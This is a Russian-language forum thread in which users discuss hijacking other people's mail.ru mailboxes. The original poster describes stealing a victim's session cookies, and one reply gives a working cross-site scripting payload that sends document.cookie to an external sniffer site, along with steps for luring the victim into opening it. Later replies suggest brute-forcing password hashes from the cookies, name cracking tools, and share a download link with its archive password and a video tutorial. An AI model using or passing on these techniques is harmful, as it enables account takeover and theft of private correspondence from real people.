Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1 2 3 4 5 6 След.
RSS
Сниффер на mail.ru [cookies], Помогите поменять пароль!!!
 
Здрасте всем, у меня такой вопрос, я спер кукки онлайн сниффером www.na-s.ru с ящика жертвы на сайте mail.ru, ввел их в опере, всё получилось и я вошол в почту своей жертвы, но я незнаю пароль и немогу поменять ничего в ящике незная пароля, подскажите есть ли способы изменить пароль или как нибудь подругому угнать ящик, спасибо зарание!
 
на колу мочало...
 
Цитата
Killercat пишет:

                                                               на колу мочало...
*  совет спс :|
 
я не уверен но попробуйте расщифровать хеш из кук
 
Цитата
ZER0   пишет:

                                                               я не уверен но попробуйте расщифровать хеш из кук

Ты имееш ввиду MD5 хеш
 
Я извиняюсь но как тебе удалось спереть куки с помощью www.na-s.ru ? В общих чертах если можно! Спс. ))
 
Цитата
Fenom пишет:

                                                               Я извиняюсь но как тебе удалось спереть куки с помощью www.na-s.ru ? В общих чертах если можно! Спс. ))

логинишся на na-s.ru это онлайн сниффер, потом открываеш блокнот и пишиш там <script>img = new Image(); img.src = "http://na-s.ru/images/1xss_1.gif?"+document.cookie;</script>
потом сохранить как допустим na-s.img затем отпровляеш это на адрес жертвы, я пробовал отпровлять тока на маил.ру незнаю на других серверах она работает или нет. И после этого через асю или агента просиш жертву открыть рисунок в почте не скачивая его и всё IP и COOКIES у тебя. Если не получится через асю или агента, то просто жди... Но ты сможеш только прочитать почту и удалять письма и прикалыватся в мире и отправлять письма с ящика только одну сессию пока не изменятся кукки, поетому надо как то изменить пароль или расшифровать секретный вопрос, а я незнаю как, если получится напиши пожалуйста, сразу предупрежу через html иходный код, MD5, и проги расшифровывающие пасс из ******** неполучится!!! возникнут трудности напиши мыло могу выслать видео!!!
 
А куда собсвенно куки приходят?а то у меня что то не приходят...если можно поподробнее...заранее спасибо! :)
 
Цитата
*** *** пишет:

                                                               А куда собсвенно куки приходят?а то у меня что то не приходят...если можно поподробнее...заранее спасибо!
Кукки приходят на сайт na-s.ru после того как жертва посмотрит скрипт сниффера... Могу дать видео...
 
вы лучше напишите как ящик угнать...
 
Цитата
explorer пишет:
вы лучше напишите как ящик угнать...
Руками как ещё =)
 
Да,пожалуйста,если можно видео,а то у меня что-то только online sniffer пашут,ну незнаю,может что то не так зделал...
 
А да,а ящик можешь угнать расшифровав MD5 хеш из куков,попробуй,может повезёт,прога для брута хешов-passwordpro,прога для работы с куками-IECookiesView,я часто ими пользуюсь.Я выложил эти две проги на rapidshare,скачать их ты сможешь отсюда http://rapidshare.com/files/141031227/Cookies.rar.html
Удачи!(И если можно видео про кукисы,заранее спасибо!) :)
 
вот интересно, пачему афтар не задал этот вопрос на форуме разработчиков этого сервиса?
 
Цитата
*** *** пишет:

                                                               А да,а ящик можешь угнать расшифровав MD5 хеш из куков,попробуй,может повезёт,прога для брута хешов-passwordpro,прога для работы с куками-IECookiesView,я часто ими пользуюсь.Я выложил эти две проги на rapidshare,скачать их ты сможешь отсюда http://rapidshare.com/files/141031227/Cookies.rar.html
Удачи!(И если можно видео про кукисы,заранее спасибо!)

А да,чуть не забыл,пароль на архив: winrar
 
Так как на счёт видео? :?:
 
аааауу :?:  :?:  :?:
 
Цитата
lsof пишет:

                                                               вот интересно, пачему афтар не задал этот вопрос на форуме разработчиков этого сервиса?
Ага пойду на mail.ru и скажу я вот научился брутить и сливать инфу с ящиков на mail.ru  а как угнать немогу допереть, и они сразу мне раскажут о всех своих дырах... Ты псих...
 
щас
 
http://ifolder.ru/7912937 смотри вот видео
Страницы: 1 2 3 4 5 6 След.
Читают тему